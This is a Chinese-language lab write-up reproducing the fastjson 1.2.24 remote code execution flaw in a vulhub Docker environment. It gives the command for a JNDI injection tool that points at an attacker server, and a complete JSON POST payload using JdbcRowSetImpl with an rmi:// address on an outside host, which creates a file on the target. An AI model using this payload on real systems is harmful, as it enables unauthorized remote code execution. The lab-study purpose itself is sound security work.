漏洞复现-fastjson

漏洞复现-fastjson复现

1.2.24 RCE

漏洞:RCE

本次复现采用docker搭建。

1
2
cd vulhub/fastjson/1.2.24-rce
docker-compose up -d

打开 http://192.168.154.131:8090/,发现有两个数据,具体不知道有什么用。

img

抓包看看

img

发包后发现回显是刚刚网页显示的,把数据复制下来利用post请求修改数据然后发包。

img

发现数据可以修改。

这里就需要涉及到一个知识点JNDI。

从github上找到了一个jndi利用工具

1
2
3
4
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A [vpsip] -C [command]

# -A:指定ip地址
# -C:需要执行的命令

img

构造数据包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST / HTTP/1.1
Host: 靶机url
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 160

{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://vpsip:1099/9cf4ag",
"autoCommit":true
}
}

发包

img

然后去目标机器上可以看到/tmp目录下创建一个success文件

img